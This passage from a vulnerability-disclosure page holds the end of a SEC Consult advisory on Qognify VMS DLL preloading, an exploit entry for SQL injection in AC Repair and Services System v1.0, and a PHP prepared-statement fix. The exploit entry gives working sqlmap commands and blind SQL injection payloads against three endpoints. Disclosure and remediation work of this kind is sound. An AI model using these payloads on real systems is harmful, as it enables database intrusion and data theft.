short overview about the vulnerability.<br />2024-01-17: Vendor support forwards the information internally, we can submit<br /> the advisory unencrypted to the support email address.<br />2024-01-17: Submitting advisory.<br />2024-01-17: Vendor support acknowledges receipt of advisory.<br />2024-01-22: Responsible person at vendor contacts us, scheduling a meeting.<br />2024-01-22: Vendor support follows up if responsible person contacted us, closes<br /> support ticket.<br />2024-01-23: Meeting with vendor.<br />2024-02-09: Vendor response with detailed information regarding updated hardening<br /> guide.<br />2024-02-13: Follow-up questions regarding hardening guide & availability, affected<br /> version number, sending new advisory draft.<br />2024-02-21: Vendor: Sends link to PartnerWeb portal regarding guideline, confirms<br /> affected versions (>=7.1).<br />2024-02-22: Updating security advisory with new information, 
scheduling release<br /> for 26th February.<br />2024-02-26: Coordinated release of advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a hardening guide for their customers which should be<br />implemented to ensure that no DLLs can be preloaded.<br /><br />It can be found in the PartnerWeb portal of Qognify linked from here:<br />https://www.qognify.com/support-training/guides-documentation/<br />https://partner.qognify.com/qognify-vms/software-documentation/technical-guides/<br /><br /><br />Workaround:<br />-----------<br />Implement the hardening guide.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Sandro Einfeldt / @2024<br /><br /></code></pre>
<pre><code># Exploit Title: AC Repair and Services System v1.0 - Multiple SQL Injection<br /># Date: 27 December 2023<br /># Exploit Author: Gnanaraj Mauviel (@0xm3m)<br /># Vendor: oretnom23<br /># Vendor Homepage: https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-acrss.zip<br /># Version: v1.0<br /># Tested on: Mac OSX, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Source Code(/php-acrss/admin/user/manage_user.php):<br /><br /><?php <br />if(isset($_GET['id'])){<br /> $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");<br /> foreach($user->fetch_array() as $k =>$v){<br /> $meta[$k] = $v;<br /> }<br />}<br />?><br /><br />-> sqlmap -u "http://localhost/php-acrss/admin/?page=user/manage_user&id=" --batch<br />---<br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=user/manage_user&id=' AND (SELECT 5500 FROM (SELECT(SLEEP(5)))hiCZ) AND 'rZIs'='rZIs<br />---<br /><br />Source Code(/php-acrss/classes/Master.php):<br /><br />function delete_inquiry(){<br /> extract($_POST);<br /> $del = $this->conn->query("DELETE FROM `inquiry_list` where id = '{$id}'");<br /> if($del){<br /> $resp['status'] = 'success';<br /> $this->settings->set_flashdata('success'," Inquiry successfully deleted.");<br /> }else{<br /> $resp['status'] = 'failed';<br /> $resp['error'] = $this->conn->error;<br /> }<br /> return json_encode($resp);<br /><br /> }<br /><br />-> sqlmap -u "http://localhost/php-acrss/classes/Master.php?f=delete_inquiry" --data="id=*" --batch<br />---<br />Parameter: #1* ((custom) POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query 
SLEEP)<br /> Payload: id=' AND (SELECT 7930 FROM (SELECT(SLEEP(5)))XwlG) AND 'Jimw'='Jimw<br />---<br /><br />Source Code(/php-acrss/classes/Users.php):<br /><br />$qry = $this->conn->query("UPDATE users set $data where id = {$id}");<br /> if($qry){<br /> $this->settings->set_flashdata('success','User Details successfully updated.');<br /> foreach($_POST as $k => $v){<br /> if($k != 'id'){<br /> if(!empty($data)) $data .=" , ";<br /> if($this->settings->userdata('id') == $id)<br /> $this->settings->set_userdata($k,$v);<br /> }<br /> }<br /><br />POST /php-acrss/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />Content-Length: 943<br />sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"<br />Accept: */*<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAUtgvsSwiJifz27g<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36<br />sec-ch-ua-platform: "macOS"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/php-acrss/admin/?page=user/manage_user&id=9<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-GB,en-US;q=0.9,en;q=0.8<br />Cookie: PHPSESSID=o92n8nati3696kg69plidv5e77<br />Connection: close<br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="id"<br /><br />9<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="firstname"<br /><br />Claire<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="middlename"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="lastname"<br /><br />Blake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="username"<br /><br />cblake<br 
/>------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="password"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="type"<br /><br />2<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g--<br /><br />-> sqlmap -r ~/Documents/POST-localhost.txt --batch<br /><br />---<br />Parameter: MULTIPART id ((custom) POST)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="id"<br /><br />(SELECT (CASE WHEN (3947=3947) THEN 9 ELSE (SELECT 2252 UNION SELECT 2638) END))<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="firstname"<br /><br />Claire<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="middlename"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="lastname"<br /><br />Blake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="username"<br /><br />cblake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="password"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="type"<br /><br />2<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g--<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: ------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="id"<br /><br />9 AND (SELECT 7168 FROM 
(SELECT(SLEEP(5)))pifO)<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="firstname"<br /><br />Claire<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="middlename"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="lastname"<br /><br />Blake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="username"<br /><br />cblake<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="password"<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="type"<br /><br />2<br />------WebKitFormBoundaryAUtgvsSwiJifz27g<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundaryAUtgvsSwiJifz27g--<br />---<br /><br /><br /></code></pre>
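The three AC Repair snippets above share one defect: request values are interpolated straight into SQL text (`'{$_GET['id']}'`, `extract($_POST)` feeding `{$id}`, and a `$data` clause assembled from POST keys), and delete_inquiry() additionally returns `$this->conn->error` to the client, which is the same kind of verbose error that made the phpMyAdmin templateId bug in the XAMPP entry earlier on this page an error-based injection oracle. The block below is an added example, not code from the AC Repair and Services System or from phpMyAdmin, rebuilding those three queries as mysqli prepared statements with the driver error kept server-side. The table and column names come from the snippets; `$conn` is assumed to be the application's mysqli handle, `get_result()` assumes the mysqlnd driver, and the function signatures are assumptions for illustration. The update function generalises the page's single case to any allow-listed set of columns.

```php
<?php
// Added example (not from the AC Repair and Services System code base or from
// phpMyAdmin): the advisory's three vulnerable queries as mysqli prepared
// statements. $conn is assumed to be the application's mysqli connection;
// table and column names are those shown in the advisory.

declare(strict_types=1);

/** manage_user.php: fetch one user by id, the id validated and bound as an integer. */
function get_user(mysqli $conn, string $rawId): ?array
{
    // Validate the shape first: a user id is a positive integer, nothing else reaches MySQL.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $conn->prepare('SELECT * FROM users WHERE id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // requires mysqlnd (assumed)
    $stmt->close();
    return $row ?: null;
}

/** Master.php delete_inquiry(): no extract($_POST), and no raw driver error in the response. */
function delete_inquiry(mysqli $conn, array $post): string
{
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return json_encode(['status' => 'failed', 'error' => 'invalid id']);
    }
    $stmt = $conn->prepare('DELETE FROM `inquiry_list` WHERE id = ?');
    $stmt->bind_param('i', $id);
    $ok = $stmt->execute();
    $affected = $stmt->affected_rows;
    $stmt->close();
    if (!$ok) {
        // Log the driver message for the operator; the client only learns that it failed.
        // Echoing $conn->error is what gives an attacker an error-based oracle.
        error_log('delete_inquiry failed: ' . $conn->error);
        return json_encode(['status' => 'failed']);
    }
    return json_encode(['status' => $affected > 0 ? 'success' : 'failed']);
}

/** Users.php save(): column names from an allow-list, values bound as parameters. */
function update_user(mysqli $conn, array $post): bool
{
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return false;
    }
    // Only these columns may be written; any other POST key is ignored rather than
    // becoming SQL text. The password is deliberately absent: it needs its own path
    // through password_hash(), not a generic column update.
    $editable = ['firstname', 'middlename', 'lastname', 'username', 'type'];
    $sets = [];
    $values = [];
    foreach ($editable as $col) {
        if (array_key_exists($col, $post)) {
            $sets[]   = "`$col` = ?";          // identifier from our list, never from the request
            $values[] = (string) $post[$col];  // value travels as a bound parameter
        }
    }
    if ($sets === []) {
        return false;
    }
    $sql   = 'UPDATE users SET ' . implode(', ', $sets) . ' WHERE id = ?';
    $stmt  = $conn->prepare($sql);
    $types = str_repeat('s', count($values)) . 'i';
    $values[] = $id;
    $stmt->bind_param($types, ...$values);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}
```

With the id bound as an integer and the column list fixed in code, the sqlmap payloads shown in the advisory (`' AND (SELECT ... SLEEP(5)) ...`, `(SELECT (CASE WHEN ...))`) are rejected by filter_var before any query is built; a value that does pass is sent as data, so there is no SQL text left for it to alter. Keeping the driver error out of the JSON response closes the second channel, the one the phpMyAdmin entry exploits.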